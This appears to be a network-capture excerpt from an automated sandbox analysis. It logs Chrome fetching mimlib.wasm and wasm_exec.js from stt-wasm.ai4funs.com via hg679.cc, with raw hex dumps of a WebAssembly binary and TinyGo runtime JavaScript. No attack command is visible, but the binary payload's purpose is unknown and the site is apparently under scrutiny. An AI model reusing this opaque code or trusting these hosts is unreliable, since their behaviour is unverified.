                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 d53a72f970327ac790782b2a7692e5f6.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: AMS58-P2
                                                                                                                                                          X-Amz-Cf-Id: 03RQf7YAXcY8VPstbReukYHzw__xHJ1PbBJSxQl4NWAxfIJDjxK80A==
                                                                                                                                                          2024-06-09 22:41:01 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          224192.168.2.549975188.114.97.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC575OUTGET /mimlib.wasm HTTP/1.1
                                                                                                                                                          Host: stt-wasm.ai4funs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://hg679.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC836INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Content-Type: application/wasm
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                          ETag: W/"88346086e882b94f3127e009fea42084"
                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          x-robots-tag: nosnippet
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lFeWc3cswRZFcw10s09XSUvCyWv3vagyB4Zgf%2FDrtXQvxhY6A0%2FN4x3bFEsq7hza4M8KUAXiXahqG7Mg5bGj0g29tJn540ek1CcN2snJXi5HFGOqM9ZJ9JjPu%2FsbO%2FlIZ87EBIXMNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8914a06e6be8e52c-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          2024-06-09 22:41:01 UTC533INData Raw: 37 63 36 64 0d 0a 00 61 73 6d 01 00 00 00 01 bc 01 1b 60 04 7f 7f 7f 7f 01 7f 60 02 7f 7f 00 60 00 00 60 01 7f 00 60 03 7f 7f 7f 00 60 01 7f 01 7f 60 02 7f 7f 01 7f 60 07 7f 7e 7f 7f 7f 7f 7f 00 60 05 7f 7f 7f 7f 7f 00 60 04 7f 7f 7f 7f 00 60 03 7f 7f 7f 01 7f 60 08 7f 7f 7f 7f 7f 7f 7f 7f 00 60 06 7f 7f 7f 7f 7f 7f 00 60 03 7f 7e 7f 00 60 02 7f 7e 00 60 00 01 7f 60 03 7f 7f 7f 01 7e 60 01 7e 01 7f 60 00 01 7c 60 03 7f 7f 7f 01 7c 60 05 7f 7e 7f 7f 7f 00 60 06 7e 7f 7f 7f 7f 7f 00 60 06 7f 7e 7f 7f 7f 7f 00 60 06 7f 7f 7f 7f 7f 7f 01 7f 60 02 7f 7c 00 60 07 7f 7f 7f 7f 7f 7f 7f 00 60 05 7f 7f 7f 7f 7f 01 7f 02 bc 02 0b 03 65 6e 76 0d 72 75 6e 74 69 6d 65 2e 74 69 63 6b 73 00 12 16 77 61 73 69 5f 73 6e 61 70 73 68 6f 74 5f 70 72 65 76 69 65 77 31 08 66 64
                                                                                                                                                          Data Ascii: 7c6dasm````````~``````~`~``~`~`|`|`~`~`~``|``envruntime.tickswasi_snapshot_preview1fd
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 04 02 04 06 05 05 05 05 05 01 05 01 01 04 0c 02 02 02 08 06 0a 0a 09 08 0a 04 13 10 10 04 06 04 01 0d 0a 0e 01 03 03 02 02 02 00 00 00 05 04 03 00 03 02 03 02 03 01 01 03 02 14 15 11 11 0e 16 01 05 03 0f 03 01 05 07 01 07 07 07 07 07 00 06 09 0f 17 00 02 04 0c 06 0a 03 0b 00 04 00 01 0e 05 09 0c 04 04 05 00 0a 0d 0d 04 18 19 0b 09 05 03 06 06 02 02 02 03 02 03 0f 01 1a 04 05 01 70 01 0b 0b 05 03 01 00 02 06 12 03 7f 01 41 80 80 04 0b 7f 01 41 00 0b 7f 01 41 00 0b 07 cb 01 0d 06 6d 65 6d 6f 72 79 02 00 06 6d 61 6c 6c 6f 63 00 7e 04 66 72 65 65 00 7f 06 63 61 6c 6c 6f 63 00 80 01 07 72 65 61 6c 6c 6f 63 00 81 01 06 5f 73 74 61 72 74 00 82 01 06 72 65 73 75 6d 65 00 83 01 0c 67 6f 5f 73 63 68 65 64 75 6c 65 72 00 84 01 15 61 73 79 6e 63 69 66 79 5f 73 74 61
                                                                                                                                                          Data Ascii: pAAAmemorymalloc~freecallocrealloc_startresumego_schedulerasyncify_sta
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 20 6a 24 00 0b 0f 0b 21 04 23 02 28 02 00 20 04 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 22 04 20 00 36 02 00 20 04 20 01 36 02 04 20 04 20 02 36 02 08 20 04 20 03 36 02 0c 20 04 20 05 36 02 10 20 04 20 06 36 02 14 20 04 20 07 36 02 18 20 04 20 08 36 02 1c 23 02 23 02 28 02 00 41 20 6a 36 02 00 0b c6 03 01 05 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 24 6b 36 02 00 23 02 28 02 00 22 06 28 02 00 21 00 20 06 28 02 04 21 01 20 06 28 02 08 21 02 20 06 28 02 0c 21 03 20 06 28 02 10 21 04 20 06 28 02 14 21 07 20 06 28 02 18 21 08 20 06 28 02 1c 21 09 20 06 28 02 20 21 06 0b 02 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 04 6b 36 02 00 23 02 28 02 00 28 02 00 21 05 0b 23 01 45 04 40 23 00 41 20 6b 22 08 24 00 20 08 42 00 37 02 14
                                                                                                                                                          Data Ascii: j$!#( 6##(Aj6#(" 6 6 6 6 6 6 6 6##(A j6#AF@##(A$k6#("(! (! (! (! (! (! (! (! ( !#AF@##(Ak6#((!#E@#A k"$ B7
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 01 36 02 00 20 01 20 07 6b 22 01 41 01 10 54 20 05 20 07 6b 41 02 6a 21 02 03 40 20 02 41 8c ad 05 28 02 00 47 04 40 20 02 41 02 10 54 20 02 41 01 6a 21 02 0c 01 0b 0b 20 01 41 04 74 41 b0 b2 05 6a 22 01 41 00 20 00 fc 0b 00 20 01 0f 0b 0b 20 08 41 03 46 41 01 23 01 1b 04 40 41 cc 87 04 41 0d 10 45 41 03 23 01 41 01 46 0d 04 1a 0b 23 01 45 04 40 00 0b 0b 20 06 41 00 23 01 1b 21 06 0b 23 01 45 04 40 41 8c ad 05 28 02 00 21 03 20 02 21 01 0c 01 0b 0b 00 0b 21 04 23 02 28 02 00 20 04 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 22 04 20 00 36 02 00 20 04 20 02 36 02 04 20 04 20 01 36 02 08 20 04 20 03 36 02 0c 20 04 20 05 36 02 10 20 04 20 06 36 02 14 20 04 20 07 36 02 18 23 02 23 02 28 02 00 41 1c 6a 36 02 00 41 00 0b c4 02 01 04 7f 23 01
                                                                                                                                                          Data Ascii: 6 k"AT kAj!@ A(G@ AT Aj! AtAj"A AFA#@AAEA#AF#E@ A#!#E@A(! !!#( 6##(Aj6#(" 6 6 6 6 6 6 6##(Aj6A#
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 20 00 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 41 00 0b bb 01 01 02 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 08 6b 36 02 00 23 02 28 02 00 22 01 28 02 00 21 00 20 01 28 02 04 21 02 0b 02 7f 23 01 41 02 46 04 7f 23 02 23 02 28 02 00 41 04 6b 36 02 00 23 02 28 02 00 28 02 00 05 41 00 0b 41 00 23 01 1b 45 04 40 20 00 10 19 41 00 23 01 41 01 46 0d 01 1a 21 02 0b 23 01 45 04 40 20 02 41 01 71 04 7f 20 00 28 02 08 05 20 00 0b 0f 0b 00 0b 21 01 23 02 28 02 00 20 01 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 22 01 20 00 36 02 00 20 01 20 02 36 02 04 23 02 23 02 28 02 00 41 08 6a 36 02 00 41 00 0b c3 01 01 01 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 04 6b 36 02 00
                                                                                                                                                          Data Ascii: ##(Aj6#( 6##(Aj6A#AF@##(Ak6#("(! (!#AF##(Ak6#((AA#E@ A#AF!#E@ Aq ( !#( 6##(Aj6#(" 6 6##(Aj6A#AF@##(Ak6
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 20 01 10 19 41 00 23 01 41 01 46 0d 01 1a 21 03 0b 20 03 20 03 41 01 71 45 23 01 1b 21 03 02 40 02 40 02 40 23 01 45 04 40 20 03 45 04 40 20 02 41 08 6a 20 01 41 10 6a 10 1a 20 02 20 02 28 02 08 22 04 36 02 b4 05 20 02 20 04 36 02 b0 05 20 02 28 02 0c 22 09 45 22 01 0d 02 20 04 2d 00 00 41 2e 47 0d 04 20 09 41 01 6b 21 09 20 04 41 01 6a 21 04 0c 04 0b 20 01 45 0d 02 20 01 41 03 71 21 03 0b 02 40 02 40 02 40 02 40 02 40 02 40 02 40 23 01 45 04 40 20 03 0d 01 41 0c 21 09 41 90 86 04 21 04 02 40 20 01 2d 00 00 41 1f 71 22 0b 41 13 6b 22 03 0e 08 00 0b 02 03 04 0a 05 06 0a 0b 0b 20 06 41 01 46 41 01 23 01 1b 04 40 20 01 10 17 41 01 23 01 41 01 46 0d 0b 1a 21 04 0b 23 01 45 04 40 20 02 20 04 36 02 b8 05 20 02 41 c8 00 6a 21 03 0b 20 06 41 02 46 41 01 23 01 1b
                                                                                                                                                          Data Ascii: A#AF! AqE#!@@@#E@ E@ Aj Aj ("6 6 ("E" -A.G Ak! Aj! E Aq!@@@@@@@#E@ A!A!@ -Aq"Ak" AFA#@ A#AF!#E@ 6 Aj! AFA#
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 01 41 01 46 0d 08 1a 21 0b 0b 23 01 45 04 40 20 02 20 0b 36 02 fc 05 20 02 41 f8 00 6a 21 01 0b 20 06 41 13 46 41 01 23 01 1b 04 40 20 01 20 0b 10 18 41 13 23 01 41 01 46 0d 08 1a 0b 23 01 45 04 40 20 02 20 02 28 02 78 22 0b 36 02 80 06 20 02 28 02 7c 21 03 20 02 41 f0 00 6a 21 01 0b 20 06 41 14 46 41 01 23 01 1b 04 40 20 01 20 04 20 09 20 0b 20 03 10 0d 41 14 23 01 41 01 46 0d 08 1a 0b 23 01 45 04 40 20 02 20 02 28 02 70 22 04 36 02 84 06 20 02 28 02 74 21 09 0c 07 0b 0b 20 06 41 15 46 41 01 23 01 1b 04 40 20 01 10 14 41 15 23 01 41 01 46 0d 07 1a 21 04 0b 23 01 45 04 40 20 02 20 04 36 02 8c 06 20 02 20 04 36 02 90 06 20 02 20 04 36 02 88 06 20 04 45 20 04 41 03 71 72 0d 02 20 04 2d 00 00 41 1f 71 41 19 47 0d 02 20 02 20 04 28 02 0c 22 04 36 02 94 06 20
                                                                                                                                                          Data Ascii: AF!#E@ 6 Aj! AFA#@ A#AF#E@ (x"6 (|! Aj! AFA#@ A#AF#E@ (p"6 (t! AFA#@ A#AF!#E@ 6 6 6 E Aqr -AqAG ("6
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 20 02 41 c0 04 6a 21 03 20 02 41 9d 05 6a 21 05 0b 20 06 41 24 46 41 01 23 01 1b 04 40 20 03 20 04 20 05 41 00 20 0c 41 01 10 1d 41 24 23 01 41 01 46 0d 0a 1a 0b 23 01 45 04 40 20 02 20 02 28 02 c0 04 22 04 36 02 f0 06 20 02 28 02 c8 04 21 07 20 02 28 02 c4 04 21 08 0b 03 40 23 01 45 04 40 20 02 20 04 36 02 f4 06 20 02 20 09 36 02 f8 06 20 0b 41 00 4c 21 03 0b 02 40 02 40 02 40 23 01 45 04 40 20 03 0d 01 20 09 2c 00 00 22 0c 41 00 4e 04 40 20 0c 41 ff 01 71 21 03 41 01 21 0c 0c 03 0b 20 02 41 90 04 6a 21 03 0b 20 06 41 25 46 41 01 23 01 1b 04 40 20 03 20 09 20 0b 10 11 41 25 23 01 41 01 46 0d 0e 1a 0b 23 01 45 04 40 20 02 28 02 90 04 21 03 20 02 28 02 94 04 22 0c 41 01 47 22 05 0d 02 20 03 41 fd ff 03 47 22 05 0d 02 20 02 41 f0 01 6a 21 03 0b 20 06 41 26
                                                                                                                                                          Data Ascii: Aj! Aj! A$FA#@ A AA$#AF#E@ ("6 (! (!@#E@ 6 6 AL!@@@#E@ ,"AN@ Aq!A! Aj! A%FA#@ A%#AF#E@ (! ("AG" AG" Aj! A&
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 0b 23 01 45 04 40 20 02 20 02 28 02 80 03 22 04 36 02 90 07 20 02 28 02 88 03 21 07 20 02 28 02 84 03 21 08 0c 08 0b 0b 20 03 20 02 41 90 03 6a 23 01 1b 21 03 20 06 41 31 46 41 01 23 01 1b 04 40 20 03 20 04 41 a0 8d 04 20 08 20 07 41 02 10 1d 41 31 23 01 41 01 46 0d 13 1a 0b 23 01 45 04 40 20 02 20 02 28 02 90 03 22 04 36 02 94 07 20 02 28 02 98 03 21 07 20 02 28 02 94 03 21 08 0c 07 0b 0b 20 03 20 02 41 a0 03 6a 23 01 1b 21 03 20 06 41 32 46 41 01 23 01 1b 04 40 20 03 20 04 41 a2 8d 04 20 08 20 07 41 02 10 1d 41 32 23 01 41 01 46 0d 12 1a 0b 23 01 45 04 40 20 02 20 02 28 02 a0 03 22 04 36 02 98 07 20 02 28 02 a8 03 21 07 20 02 28 02 a4 03 21 08 0c 06 0b 0b 20 03 20 02 41 b0 03 6a 23 01 1b 21 03 20 06 41 33 46 41 01 23 01 1b 04 40 20 03 20 04 41 a4 8d 04
                                                                                                                                                          Data Ascii: #E@ ("6 (! (! Aj#! A1FA#@ A AA1#AF#E@ ("6 (! (! Aj#! A2FA#@ A AA2#AF#E@ ("6 (! (! Aj#! A3FA#@ A
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 07 20 03 41 00 48 22 0d 0d 02 20 05 41 1f 20 03 20 03 41 1f 4f 1b 75 41 0f 71 22 0d 41 0f 46 0d 0b 20 02 20 0d 41 96 83 04 6a 2d 00 00 3a 00 a7 05 20 02 41 c0 02 6a 21 0d 20 02 41 a7 05 6a 21 10 0b 20 06 41 3d 46 41 01 23 01 1b 04 40 20 0d 20 04 20 10 20 08 20 07 41 01 10 1d 41 3d 23 01 41 01 46 0d 0e 1a 0b 23 01 45 04 40 20 02 20 02 28 02 c0 02 22 04 36 02 c0 07 20 03 41 04 6b 21 03 20 02 28 02 c8 02 21 07 20 02 28 02 c4 02 21 08 0c 01 0b 0b 0b 23 01 45 04 40 20 02 20 04 36 02 d0 07 0b 0b 23 01 45 04 40 20 02 20 04 36 02 84 07 20 02 20 04 36 02 88 07 20 0b 20 0c 49 22 03 0d 02 20 0b 20 0c 6b 21 0b 20 09 20 0c 6a 21 09 0c 01 0b 0b 0b 20 06 41 3e 46 41 01 23 01 1b 04 40 10 1e 41 3e 23 01 41 01 46 0d 09 1a 0b 23 01 45 04 40 00 0b 0b 20 01 20 02 41 c0 01 6a
                                                                                                                                                          Data Ascii: AH" A AOuAq"AF Aj-: Aj! Aj! A=FA#@ AA=#AF#E@ ("6 Ak! (! (!#E@ 6#E@ 6 6 I" k! j! A>FA#@A>#AF#E@ Aj


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          225192.168.2.549971188.114.97.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC524OUTGET /wasm_exec.js HTTP/1.1
                                                                                                                                                          Host: stt-wasm.ai4funs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC860INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Cache-Control: public, max-age=14400, must-revalidate
                                                                                                                                                          ETag: W/"cb86ea27dd7c6c898f98d617d86fb707"
                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          x-robots-tag: nosnippet
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CGOx5SWCPNPx5Hr8zkvQCQE%2BGVKCALe7S3kwKNYUbcGCt1utclKA5dEBDjEfFH%2FXF05pz%2FABOUszeu4%2BPaPVWRDhHx3RxaQWnGjKy%2B%2Bdsp9GEkba2n81jXf%2FQdg4NGM%2FmmqUvbJ8ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 430
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8914a06e7e3c0b7e-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          2024-06-09 22:41:01 UTC509INData Raw: 33 66 36 34 0d 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 38 20 54 68 65 20 47 6f 20 41 75 74 68 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2f 2f 20 55 73 65 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 67 6f 76 65 72 6e 65 64 20 62 79 20 61 20 42 53 44 2d 73 74 79 6c 65 0a 2f 2f 20 6c 69 63 65 6e 73 65 20 74 68 61 74 20 63 61 6e 20 62 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 2e 0a 2f 2f 0a 2f 2f 20 54 68 69 73 20 66 69 6c 65 20 68 61 73 20 62 65 65 6e 20 6d 6f 64 69 66 69 65 64 20 66 6f 72 20 75 73 65 20 62 79 20 74 68 65 20 54 69 6e 79 47 6f 20 63 6f 6d 70 69 6c 65 72 2e 0a 0a 28 28 29 20 3d 3e 20 7b 0a 09 2f 2f 20 4d 61 70 20 6d 75 6c 74 69 70
                                                                                                                                                          Data Ascii: 3f64// Copyright 2018 The Go Authors. All rights reserved.// Use of this source code is governed by a BSD-style// license that can be found in the LICENSE file.//// This file has been modified for use by the TinyGo compiler.(() => {// Map multip
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 09 7d 20 65 6c 73 65 20 69 66 20 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 0a 09 09 77 69 6e 64 6f 77 2e 67 6c 6f 62 61 6c 20 3d 20 77 69 6e 64 6f 77 3b 0a 09 7d 20 65 6c 73 65 20 69 66 20 28 74 79 70 65 6f 66 20 73 65 6c 66 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 0a 09 09 73 65 6c 66 2e 67 6c 6f 62 61 6c 20 3d 20 73 65 6c 66 3b 0a 09 7d 20 65 6c 73 65 20 7b 0a 09 09 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 63 61 6e 6e 6f 74 20 65 78 70 6f 72 74 20 47 6f 20 28 6e 65 69 74 68 65 72 20 67 6c 6f 62 61 6c 2c 20 77 69 6e 64 6f 77 20 6e 6f 72 20 73 65 6c 66 20 69 73 20 64 65 66 69 6e 65 64 29 22 29 3b 0a 09 7d 0a 0a 09 69 66 20 28 21 67 6c 6f 62 61 6c 2e 72 65 71 75 69 72 65 20
                                                                                                                                                          Data Ascii: } else if (typeof window !== "undefined") {window.global = window;} else if (typeof self !== "undefined") {self.global = self;} else {throw new Error("cannot export Go (neither global, window nor self is defined)");}if (!global.require
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 2c 0a 09 09 09 66 63 68 6f 77 6e 28 66 64 2c 20 75 69 64 2c 20 67 69 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 65 6e 6f 73 79 73 28 29 29 3b 20 7d 2c 0a 09 09 09 66 73 74 61 74 28 66 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 65 6e 6f 73 79 73 28 29 29 3b 20 7d 2c 0a 09 09 09 66 73 79 6e 63 28 66 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 6e 75 6c 6c 29 3b 20 7d 2c 0a 09 09 09 66 74 72 75 6e 63 61 74 65 28 66 64 2c 20 6c 65 6e 67 74 68 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 65 6e 6f 73 79 73 28 29 29 3b 20 7d 2c 0a 09 09 09 6c 63 68 6f 77 6e 28 70 61 74 68 2c 20 75 69 64 2c 20 67 69 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c
                                                                                                                                                          Data Ascii: ,fchown(fd, uid, gid, callback) { callback(enosys()); },fstat(fd, callback) { callback(enosys()); },fsync(fd, callback) { callback(null); },ftruncate(fd, length, callback) { callback(enosys()); },lchown(path, uid, gid, callback) { call
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 69 72 28 29 20 7b 20 74 68 72 6f 77 20 65 6e 6f 73 79 73 28 29 3b 20 7d 2c 0a 09 09 7d 0a 09 7d 0a 0a 09 69 66 20 28 21 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 20 7b 0a 09 09 63 6f 6e 73 74 20 6e 6f 64 65 43 72 79 70 74 6f 20 3d 20 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 3b 0a 09 09 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 20 3d 20 7b 0a 09 09 09 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 62 29 20 7b 0a 09 09 09 09 6e 6f 64 65 43 72 79 70 74 6f 2e 72 61 6e 64 6f 6d 46 69 6c 6c 53 79 6e 63 28 62 29 3b 0a 09 09 09 7d 2c 0a 09 09 7d 3b 0a 09 7d 0a 0a 09 69 66 20 28 21 67 6c 6f 62 61 6c 2e 70 65 72 66 6f 72 6d 61 6e 63 65 29 20 7b 0a 09 09 67 6c 6f 62 61 6c 2e 70 65 72 66 6f 72 6d 61 6e 63 65 20 3d 20 7b 0a 09 09 09 6e 6f 77 28 29 20 7b 0a 09
                                                                                                                                                          Data Ascii: ir() { throw enosys(); },}}if (!global.crypto) {const nodeCrypto = require("crypto");global.crypto = {getRandomValues(b) {nodeCrypto.randomFillSync(b);},};}if (!global.performance) {global.performance = {now() {
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 09 09 69 66 20 28 21 69 73 4e 61 4e 28 66 29 29 20 7b 0a 09 09 09 09 09 72 65 74 75 72 6e 20 66 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 63 6f 6e 73 74 20 69 64 20 3d 20 6d 65 6d 28 29 2e 67 65 74 55 69 6e 74 33 32 28 61 64 64 72 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 76 61 6c 75 65 73 5b 69 64 5d 3b 0a 09 09 09 7d 0a 0a 09 09 09 63 6f 6e 73 74 20 73 74 6f 72 65 56 61 6c 75 65 20 3d 20 28 61 64 64 72 2c 20 76 29 20 3d 3e 20 7b 0a 09 09 09 09 63 6f 6e 73 74 20 6e 61 6e 48 65 61 64 20 3d 20 30 78 37 46 46 38 30 30 30 30 3b 0a 0a 09 09 09 09 69 66 20 28 74 79 70 65 6f 66 20 76 20 3d 3d 3d 20 22 6e 75 6d 62 65 72 22 29 20 7b 0a 09 09 09 09 09 69 66 20 28 69 73 4e 61 4e 28 76 29 29 20 7b 0a 09 09 09 09 09 09 6d 65 6d 28 29
                                                                                                                                                          Data Ascii: if (!isNaN(f)) {return f;}const id = mem().getUint32(addr, true);return this._values[id];}const storeValue = (addr, v) => {const nanHead = 0x7FF80000;if (typeof v === "number") {if (isNaN(v)) {mem()
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 20 22 73 79 6d 62 6f 6c 22 3a 0a 09 09 09 09 09 09 74 79 70 65 46 6c 61 67 20 3d 20 33 3b 0a 09 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 09 63 61 73 65 20 22 66 75 6e 63 74 69 6f 6e 22 3a 0a 09 09 09 09 09 09 74 79 70 65 46 6c 61 67 20 3d 20 34 3b 0a 09 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 7d 0a 09 09 09 09 6d 65 6d 28 29 2e 73 65 74 55 69 6e 74 33 32 28 61 64 64 72 20 2b 20 34 2c 20 6e 61 6e 48 65 61 64 20 7c 20 74 79 70 65 46 6c 61 67 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 6d 65 6d 28 29 2e 73 65 74 55 69 6e 74 33 32 28 61 64 64 72 2c 20 69 64 2c 20 74 72 75 65 29 3b 0a 09 09 09 7d 0a 0a 09 09 09 63 6f 6e 73 74 20 6c 6f 61 64 53 6c 69 63 65 20 3d 20 28 61 72 72 61 79 2c 20 6c 65 6e 2c 20 63 61 70 29 20 3d 3e 20 7b 0a 09 09 09 09 72 65
                                                                                                                                                          Data Ascii: "symbol":typeFlag = 3;break;case "function":typeFlag = 4;break;}mem().setUint32(addr + 4, nanHead | typeFlag, true);mem().setUint32(addr, id, true);}const loadSlice = (array, len, cap) => {re
